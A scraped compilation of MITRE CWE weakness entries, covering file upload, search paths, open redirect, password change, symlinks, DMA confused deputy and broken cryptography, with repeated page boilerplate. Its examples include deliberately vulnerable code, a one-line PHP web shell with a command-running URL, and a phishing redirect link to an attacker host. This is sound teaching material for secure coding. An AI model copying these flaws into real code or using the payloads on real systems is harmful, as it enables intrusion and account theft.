Example 1 A SoC contains a microcontroller (running ring-3 (least trusted ring) code), a Memory Mapped Input Output (MMIO) mapped IP core (containing design-house secrets), and a Direct Memory Access (DMA) controller, among several other compute elements and peripherals. The SoC implements access control to protect the registers in the IP core (which registers store the design-house secrets) from malicious, ring-3 (least trusted ring) code executing on the microcontroller. The DMA controller, however, is not blocked off from accessing the IP core for functional reasons. (bad code)
Example Language: Other
The code in ring-3 (least trusted ring) of the
microcontroller attempts to directly read the protected
registers in IP core through MMIO transactions. However,
this attempt is blocked due to the implemented access
control. Now, the microcontroller configures the DMA core
to transfer data from the protected registers to a memory
region that it has access to. The DMA core, which is
acting as an intermediary in this transaction, does not
preserve the identity of the microcontroller and, instead,
initiates a new transaction with its own identity. Since
the DMA core has access, the transaction (and hence, the
attack) is successful.
The weakness here is that the intermediary or the proxy agent did not ensure the immutability of the identity of the microcontroller initiating the transaction. (good code)
Example Language: Other
The DMA
core forwards this transaction with the identity of the
code executing on the microcontroller, which is the
original initiator of the end-to-end transaction. Now the
transaction is blocked, as a result of forwarding the
identity of the true initiator which lacks the permission
to access the confidential MMIO mapped IP core.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This weakness has a chaining relationship with CWE-668 (Exposure of Resource to Wrong Sphere) because the proxy effectively provides the attacker with access to the target's resources that the attacker cannot directly obtain.
Theoretical
It could be argued that the "confused deputy" is a fundamental aspect of most vulnerabilities that require an active attacker. Even for common implementation issues such as buffer overflows, SQL injection, OS command injection, and path traversal, the vulnerable program already has the authorization to run code or access files. The vulnerability arises when the attacker causes the program to run unexpected code or access unexpected files.
Maintenance
This could possibly be considered as an emergent resource.
CWE-61: UNIX Symbolic Link (Symlink) Following
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product, when opening a file or directory, does not sufficiently account for when the file is a symbolic link that resolves to a target outside of the intended control sphere. This could allow an attacker to cause the product to operate on unauthorized files.
A product that allows UNIX symbolic links (symlink) as part of paths whether in internal code or through user input can allow an attacker to spoof the symbolic link and traverse the file system to unintended locations or access arbitrary files. The symbolic link can permit an attacker to read/write/corrupt a file that they originally did not have permissions to access.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Research Gap Symlink vulnerabilities are regularly found in C and shell programs, but all programming languages can have this problem. Even shell programs are probably under-reported. "Second-order symlink vulnerabilities" may exist in programs that invoke other programs that follow symlinks. They are rarely reported but are likely to be fairly common when process invocation is used [REF-493].
CWE-419: Unprotected Primary Channel
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a primary channel for administration or restricted functionality, but it does not properly protect the channel.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-523: Unprotected Transport of Credentials
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterLogin pages do not use adequate measures to protect the user name and password while they are in transit from the client to the server.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-434: Unrestricted Upload of File with Dangerous Type
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code intends to allow a user to upload a picture to the web server. The HTML code that drives the form on the user end has an input field of type "file". (good code)
Example Language: HTML
<form action="upload_picture.php" method="post" enctype="multipart/form-data">
Choose a file to upload: <input type="file" name="filename"/> <br/> <input type="submit" name="submit" value="Submit"/> </form> Once submitted, the form above sends the file to upload_picture.php on the web server. PHP stores the file in a temporary location until it is retrieved (or discarded) by the server side code. In this example, the file is moved to a more permanent pictures/ directory. (bad code)
Example Language: PHP
// Define the target location where the picture being // uploaded is going to be saved. $target = "pictures/" . basename($_FILES['uploadedfile']['name']); // Move the uploaded file to the new location. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target)) { echo "The picture has been successfully uploaded."; }else { echo "There was an error uploading the picture, please try again."; }The problem with the above code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, an attacker could upload a file with the name: (attack code)
malicious.php
Since this filename ends in ".php" it can be executed by the web server. In the contents of this uploaded file, the attacker could use: (attack code)
Example Language: PHP
<?php
system($_GET['cmd']);
?> Once this file has been installed, the attacker can enter arbitrary commands to execute using a URL such as: (attack code)
http://server.example.com/upload_dir/malicious.php?cmd=ls%20-l
which runs the "ls -l" command - or any other type of command that the attacker wants to specify. Example 2 The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet. (good code)
Example Language: HTML
<form action="FileUploadServlet" method="post" enctype="multipart/form-data">
Choose a file to upload: <input type="file" name="filename"/> <br/> <input type="submit" name="submit" value="Submit"/> </form> When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory. (bad code)
Example Language: Java
public class FileUploadServlet extends HttpServlet {
...
protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { response.setContentType("text/html");
PrintWriter out = response.getWriter(); String contentType = request.getContentType(); // the starting position of the boundary header int ind = contentType.indexOf("boundary="); String boundary = contentType.substring(ind+9); String pLine = new String(); String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value // verify that content type is multipart form data if (contentType != null && contentType.indexOf("multipart/form-data") != -1) { // extract the filename from the Http header
BufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream())); ... pLine = br.readLine(); String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\"")); ... // output the file to the local upload directory try { BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));
for (String line; (line=br.readLine())!=null; ) { if (line.indexOf(boundary) == -1) { } //end of for loopbw.write(line); }bw.newLine(); bw.flush(); bw.close(); } catch (IOException ex) {...} // output successful upload response HTML page // output unsuccessful upload response HTML page else {...} ...
This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code. Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship This can have a chaining relationship with incomplete denylist / permissive allowlist errors when the product tries, but fails, to properly limit which types of files are allowed (CWE-183, CWE-184). This can also overlap multiple interpretation errors for intermediaries, e.g. anti-virus products that do not remove or quarantine attachments with certain file extensions that can be processed by client systems.
CWE-426: Untrusted Search Path
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product searches for critical resources using an externally-supplied search path that can point to resources that are not under the product's direct control.
This might allow attackers to execute their own programs, access unauthorized data files, or modify configuration in unexpected ways. If the product uses a search path to locate critical resources such as programs, then an attacker could modify that search path to point to a malicious program, which the targeted product would then execute. The problem extends to any type of critical resource that the product trusts. Some of the most common variants of untrusted search path are:
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This program is intended to execute a command that lists the contents of a restricted directory, then performs other actions. Assume that it runs with setuid privileges in order to bypass the permissions check by the operating system. (bad code)
Example Language: C
#define DIR "/restricted/directory"
char cmd[500]; sprintf(cmd, "ls -l %480s", DIR); /* Raise privileges to those needed for accessing DIR. */ RaisePrivileges(...); system(cmd); DropPrivileges(...); ... This code may look harmless at first, since both the directory and the command are set to fixed values that the attacker can't control. The attacker can only see the contents for DIR, which is the intended program behavior. Finally, the programmer is also careful to limit the code that executes with raised privileges. However, because the program does not modify the PATH environment variable, the following attack would work: (attack code)
Example 2 The following code from a system utility uses the system property APPHOME to determine the directory in which it is installed and then executes an initialization script based on a relative path from the specified directory. (bad code)
Example Language: Java
...
String home = System.getProperty("APPHOME"); String cmd = home + INITCMD; java.lang.Runtime.getRuntime().exec(cmd); ... The code above allows an attacker to execute arbitrary commands with the elevated privilege of the application by modifying the system property APPHOME to point to a different path containing a malicious version of INITCMD. Because the program does not validate the value read from the environment, if an attacker can control the value of the system property APPHOME, then they can fool the application into running malicious code and take control of the system. Example 3 This code prints all of the running processes belonging to the current user. (bad code)
Example Language: PHP
//assume getCurrentUser() returns a username that is guaranteed to be alphanumeric (avoiding CWE-78) $userName = getCurrentUser(); $command = 'ps aux | grep ' . $userName; system($command); If invoked by an unauthorized web user, it is providing a web page of potentially sensitive information on the underlying system, such as command-line arguments (CWE-497). This program is also potentially vulnerable to a PATH based attack (CWE-426), as an attacker may be able to create malicious versions of the ps or grep commands. While the program does not explicitly raise privileges to run the system commands, the PHP interpreter may by default be running with higher privileges than users. Example 4 The following code is from a web application that allows users access to an interface through which they can update their password on the system. In this environment, user passwords can be managed using the Network Information System (NIS), which is commonly used on UNIX systems. When performing NIS updates, part of the process for updating passwords is to run a make command in the /var/yp directory. Performing NIS updates requires extra privileges. (bad code)
Example Language: Java
...
System.Runtime.getRuntime().exec("make"); ... The problem here is that the program does not specify an absolute path for make and does not clean its environment prior to executing the call to Runtime.exec(). If an attacker can modify the $PATH variable to point to a malicious binary called make and cause the program to be executed in their environment, then the malicious binary will be loaded instead of the one intended. Because of the nature of the application, it runs with the privileges necessary to perform system operations, which means the attacker's make will now be run with these privileges, possibly giving the attacker complete control of the system. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-283: Unverified Ownership
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product does not properly verify that a critical resource is owned by the proper entity.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This function is part of a privileged program that takes input from users with potentially lower privileges. (bad code)
Example Language: Python
def killProcess(processID):
os.kill(processID, signal.SIGKILL)
This code does not confirm that the process to be killed is owned by the requesting user, thus allowing an attacker to kill arbitrary processes. This function remedies the problem by checking the owner of the process before killing it: (good code)
Example Language: Python
def killProcess(processID):
user = getCurrentUser()
#Check process owner against requesting user if getProcessOwner(processID) == user: os.kill(processID, signal.SIGKILL)
return else: print("You cannot kill a process you don't own")
return Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
This overlaps insufficient comparison, verification errors, permissions, and privileges.
CWE-620: Unverified Password Change
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterWhen setting a new password for a user, the product does not require knowledge of the original password, or using another form of authentication.
This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code changes a user's password. (bad code)
Example Language: PHP
$user = $_GET['user'];
$pass = $_GET['pass']; $checkpass = $_GET['checkpass']; if ($pass == $checkpass) { SetUserPassword($user, $pass); }While the code confirms that the requesting user typed the same new password twice, it does not confirm that the user requesting the password change is the same user whose password will be changed. An attacker can request a change of another user's password and gain control of the victim's account. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-601: URL Redirection to Untrusted Site ('Open Redirect')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code obtains a URL from the query string and then redirects the user to that URL. (bad code)
Example Language: PHP
$redirect_url = $_GET['url'];
header("Location: " . $redirect_url); The problem with the above code is that an attacker could use this page as part of a phishing scam by redirecting users to a malicious site. For example, assume the above code is in the file example.php. An attacker could supply a user with the following link: (attack code)
http://example.com/example.php?url=http://malicious.example.com
The user sees the link pointing to the original trusted site (example.com) and does not realize the redirection that could take place. Example 2 The following code is a Java servlet that will receive a GET request with a url parameter in the request to redirect the browser to the address specified in the url parameter. The servlet will retrieve the url parameter value from the request and send a response to redirect the browser to the url address. (bad code)
Example Language: Java
public class RedirectServlet extends HttpServlet {
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
String query = request.getQueryString(); }if (query.contains("url")) { String url = request.getParameter("url"); }response.sendRedirect(url); The problem with this Java servlet code is that an attacker could use the RedirectServlet as part of an e-mail phishing scam to redirect users to a malicious site. An attacker could send an HTML formatted e-mail directing the user to log into their account by including in the e-mail the following link: (attack code)
Example Language: HTML
<a href="http://bank.example.com/redirect?url=http://attacker.example.net">Click here to log in</a>
The user may assume that the link is safe since the URL starts with their trusted bank, bank.example.com. However, the user will then be redirected to the attacker's web site (attacker.example.net) which the attacker may have made to appear very similar to bank.example.com. The user may then unwittingly enter credentials into the attacker's web page and compromise their bank account. A Java servlet should never redirect a user to a URL without verifying that the redirect address is a trusted site. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Other
Whether this issue poses a vulnerability will be subject to the intended behavior of the application. For example, a search engine might intentionally provide redirects to arbitrary URLs.
CWE-327: Use of a Broken or Risky Cryptographic Algorithm
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterCryptographic algorithms are the methods by which data is scrambled to prevent observation or influence by unauthorized actors. Insecure cryptography can be exploited to expose sensitive information, modify data in unexpected ways, spoof identities of other users or devices, or other impacts. It is very difficult to produce a secure algorithm, and even high-profile algorithms by accomplished cryptographic experts have been broken. Well-known techniques exist to break or weaken various kinds of cryptography. Accordingly, there are a small number of well-understood and heavily studied algorithms that should be used by most products. Using a non-standard or known-insecure algorithm is dangerous because a determined adversary may be able to break the algorithm and compromise whatever data has been protected. Since the state of cryptography advances so rapidly, it is common for an algorithm to be considered "unsafe" even if it was once thought to be strong. This can happen when new attacks are discovered, or if computing power increases so much that the cryptographic algorithm no longer provides the amount of protection that was originally thought. For a number of reasons, this weakness is even more challenging to manage with hardware deployment of cryptographic algorithms as opposed to software implementation. First, if a flaw is discovered with hardware-implemented cryptography, the flaw cannot be fixed in most cases without a recall of the product, because hardware is not easily replaceable like software. Second, because the hardware product is expected to work for years, the adversary's computing power will only increase over time. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 These code examples use the Data Encryption Standard (DES). (bad code)
Example Language: C
EVP_des_ecb();
(bad code)
Example Language: Java
Cipher des=Cipher.getInstance("DES...");
des.initEncrypt(key2); (bad code)
Example Language: PHP
function encryptPassword($password){
$iv_size = mcrypt_get_iv_size(MCRYPT_DES, MCRYPT_MODE_ECB); }$iv = mcrypt_create_iv($iv_size, MCRYPT_RAND); $key = "This is a password encryption key"; $encryptedPassword = mcrypt_encrypt(MCRYPT_DES, $key, $password, MCRYPT_MODE_ECB, $iv); return $encryptedPassword; Once considered a strong algorithm, DES now regarded as insufficient for many applications. It has been replaced by Advanced Encryption Standard (AES). Example 2 Suppose a chip manufacturer decides to implement a hashing scheme for verifying integrity property of certain bitstream, and it chooses to implement a SHA1 hardware accelerator for to implement the scheme. (bad code)
Example Language: Other
The manufacturer chooses a SHA1 hardware accelerator for to implement the scheme because it already has a working SHA1 Intellectual Property (IP) that the manufacturer had created and used earlier, so this reuse of IP saves design cost.
However, SHA1 was theoretically broken in 2005 and practically broken in 2017 at a cost of $110K. This means an attacker with access to cloud-rented computing power will now be able to provide a malicious bitstream with the same hash value, thereby defeating the purpose for which the hash was used. This issue could have been avoided with better design. (good code)
Example Language: Other
The manufacturer could have chosen a cryptographic solution that is recommended by the wide security community (including standard-setting bodies like NIST) and is not expected to be broken (or even better, weakened) within the reasonable life expectancy of the hardware product. In this case, the architects could have used SHA-2 or SHA-3, even if it meant that such choice would cost extra.
